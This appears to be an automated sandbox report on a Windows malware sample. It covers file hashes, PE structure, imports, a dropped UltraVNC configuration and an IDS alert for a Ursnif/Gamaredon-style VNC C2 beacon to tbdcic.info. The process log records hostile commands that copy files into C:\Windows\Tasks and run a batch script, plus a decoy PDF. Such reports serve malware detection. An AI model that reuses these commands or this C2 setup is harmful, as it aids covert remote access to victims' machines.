                                                                                        Entropy (8bit):5.216893826927931
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                                        MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                                        SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                                        SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                                        SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                                        Malicious:false
                                                                                        Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.952472042394955
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:7q551ugrWe.exe
                                                                                        File size:1'664'495 bytes
                                                                                        MD5:d61940626fad051067bfd16f2ab4e657
                                                                                        SHA1:cceaeda73fca724016bac0c9cb000fcd4ca1e523
                                                                                        SHA256:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
                                                                                        SHA512:ca97c277acda035354e904e72dd9ab52547eec12f42cd3de5acd075e4af9785a807dfacfdfb65ffd43d88ee31eabc28d572a83d0599701fe7a1aa36bbd09f869
                                                                                        SSDEEP:24576:WKWs4sgeV+OkCbkE/ClHrI3phRLFry+IVGjZP7gzF77/voe2D7UGxxy+vJy:TFFV+SbkE/yHkPRd4iazZoe2DNm
                                                                                        TLSH:A1752351B6D3D8F4DA57227111B1AD132F63DD2A164128CF738DFA067A30683F92BA72
                                                                                        File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                                                        Icon Hash:357561d6dad24d55
                                                                                        Entrypoint:0x41382f
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:1d1577d864d2da06952f7affd8635371
                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push FFFFFFFFh
                                                                                        push 00416E98h
                                                                                        push 004139C0h
                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                        push eax
                                                                                        mov dword ptr fs:[00000000h], esp
                                                                                        sub esp, 68h
                                                                                        push ebx
                                                                                        push esi
                                                                                        push edi
                                                                                        mov dword ptr [ebp-18h], esp
                                                                                        xor ebx, ebx
                                                                                        mov dword ptr [ebp-04h], ebx
                                                                                        push 00000002h
                                                                                        call dword ptr [004151DCh]
                                                                                        pop ecx
                                                                                        or dword ptr [0041B9E4h], FFFFFFFFh
                                                                                        or dword ptr [0041B9E8h], FFFFFFFFh
                                                                                        call dword ptr [004151E0h]
                                                                                        mov ecx, dword ptr [004199C4h]
                                                                                        mov dword ptr [eax], ecx
                                                                                        call dword ptr [004151E4h]
                                                                                        mov ecx, dword ptr [004199C0h]
                                                                                        mov dword ptr [eax], ecx
                                                                                        mov eax, dword ptr [004151E8h]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov dword ptr [0041B9E0h], eax
                                                                                        call 00007FE878D1EF52h
                                                                                        cmp dword ptr [00419780h], ebx
                                                                                        jne 00007FE878D1EE3Eh
                                                                                        push 004139B8h
                                                                                        call dword ptr [004151ECh]
                                                                                        pop ecx
                                                                                        call 00007FE878D1EF24h
                                                                                        push 00419050h
                                                                                        push 0041904Ch
                                                                                        call 00007FE878D1EF0Fh
                                                                                        mov eax, dword ptr [004199BCh]
                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                        lea eax, dword ptr [ebp-6Ch]
                                                                                        push eax
                                                                                        push dword ptr [004199B8h]
                                                                                        lea eax, dword ptr [ebp-64h]
                                                                                        push eax
                                                                                        lea eax, dword ptr [ebp-70h]
                                                                                        push eax
                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                        push eax
                                                                                        call dword ptr [004151F4h]
                                                                                        push 00419048h
                                                                                        push 00419000h
                                                                                        call 00007FE878D1EEDCh
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x1c0000x309f00x30a0032c6714aa776c8352eda97e813ef0b21False0.7375381587403599data7.293326377493547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                                                        RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                                                        RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
                                                                                        RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                                                        RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                                                        RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                                                        RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                                                        RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                                                        RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                                                        RT_VERSION0x283600x350data0.4693396226415094
                                                                                        RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599
                                                                                        DLLImport
                                                                                        COMCTL32.dll
                                                                                        SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                                        GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                                        ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                                        USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                                                        ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                                        OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                                                        KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                                                        MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        RussianRussia
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-23T13:41:06.611036+01002035893ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon1192.168.2.949930194.190.152.201443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 23, 2024 13:39:58.296355009 CET49771443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:39:58.296401024 CET44349771194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:39:58.296555996 CET49771443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:39:58.296747923 CET49771443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:39:58.296761990 CET44349771194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:39:58.296813965 CET44349771194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:39:58.408020020 CET49772443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:39:58.408099890 CET44349772194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:39:58.408179998 CET49772443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:39:58.408293962 CET49772443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:39:58.408318996 CET44349772194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:39:58.408435106 CET44349772194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:40:10.267014980 CET49799443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:40:10.267060041 CET44349799194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:40:10.267345905 CET49799443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:40:10.267481089 CET49799443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:40:10.267505884 CET44349799194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:40:10.267563105 CET44349799194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:40:32.631025076 CET49850443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:40:32.631055117 CET44349850194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:40:32.631125927 CET49850443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:40:32.631236076 CET49850443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:40:32.631246090 CET44349850194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:40:32.631428957 CET44349850194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:06.608294964 CET49930443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:06.608333111 CET44349930194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:06.608397961 CET49930443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:06.608561039 CET49930443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:06.608566999 CET44349930194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:06.611036062 CET49930443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:06.611042023 CET44349930194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:06.611224890 CET44349930194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:51.239324093 CET49996443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:51.239383936 CET44349996194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:51.239475965 CET49996443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:51.242892027 CET49996443192.168.2.9194.190.152.201
                                                                                        Dec 23, 2024 13:41:51.242904902 CET44349996194.190.152.201192.168.2.9
                                                                                        Dec 23, 2024 13:41:51.242959976 CET44349996194.190.152.201192.168.2.9
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 23, 2024 13:39:51.541707993 CET5659553192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:39:58.039297104 CET6386653192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:39:58.178145885 CET53638661.1.1.1192.168.2.9
                                                                                        Dec 23, 2024 13:40:18.278340101 CET6399153192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:40:18.427407026 CET53639911.1.1.1192.168.2.9
                                                                                        Dec 23, 2024 13:40:42.351047039 CET6075553192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:40:42.489831924 CET53607551.1.1.1192.168.2.9
                                                                                        Dec 23, 2024 13:41:06.467329025 CET5482653192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:41:06.604892015 CET53548261.1.1.1192.168.2.9
                                                                                        Dec 23, 2024 13:41:30.536657095 CET5641653192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:41:30.676537037 CET53564161.1.1.1192.168.2.9
                                                                                        Dec 23, 2024 13:41:54.652226925 CET5729053192.168.2.91.1.1.1
                                                                                        Dec 23, 2024 13:41:54.796623945 CET53572901.1.1.1192.168.2.9
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 23, 2024 13:39:51.541707993 CET192.168.2.91.1.1.10x59f5Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:39:58.039297104 CET192.168.2.91.1.1.10xe6d0Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:40:18.278340101 CET192.168.2.91.1.1.10x275cStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:40:42.351047039 CET192.168.2.91.1.1.10x7c3bStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:41:06.467329025 CET192.168.2.91.1.1.10x486bStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:41:30.536657095 CET192.168.2.91.1.1.10x158eStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:41:54.652226925 CET192.168.2.91.1.1.10x7acbStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 23, 2024 13:39:35.543591022 CET1.1.1.1192.168.2.90x2ecdNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 23, 2024 13:39:35.543591022 CET1.1.1.1192.168.2.90x2ecdNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:39:51.682699919 CET1.1.1.1192.168.2.90x59f5No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 23, 2024 13:39:53.456017971 CET1.1.1.1192.168.2.90xd13dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:39:53.456017971 CET1.1.1.1192.168.2.90xd13dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:39:58.178145885 CET1.1.1.1192.168.2.90xe6d0No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:40:18.427407026 CET1.1.1.1192.168.2.90x275cNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:40:42.489831924 CET1.1.1.1192.168.2.90x7c3bNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:41:06.604892015 CET1.1.1.1192.168.2.90x486bNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:41:30.676537037 CET1.1.1.1192.168.2.90x158eNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                                        Dec 23, 2024 13:41:54.796623945 CET1.1.1.1192.168.2.90x7acbNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false

                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:07:39:38
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\7q551ugrWe.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'664'495 bytes
                                                                                        MD5 hash:D61940626FAD051067BFD16F2AB4E657
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:2
                                                                                        Start time:07:39:38
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                                        Imagebase:0xc50000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:07:39:38
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff70f010000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:07:39:39
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
                                                                                        Imagebase:0xc50000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:07:39:39
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff70f010000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:07:39:39
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
                                                                                        Imagebase:0xc50000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:07:39:39
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff70f010000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:8
                                                                                        Start time:07:39:39
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 1
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:07:39:40
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                                        Imagebase:0x7ff6153b0000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:10
                                                                                        Start time:07:39:40
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 1
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:07:39:41
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff61f300000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:12
                                                                                        Start time:07:39:41
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:taskkill /f /im sync_browser.exe
                                                                                        Imagebase:0x30000
                                                                                        File size:74'240 bytes
                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:07:39:41
                                                                                        Start date:23/12/2024
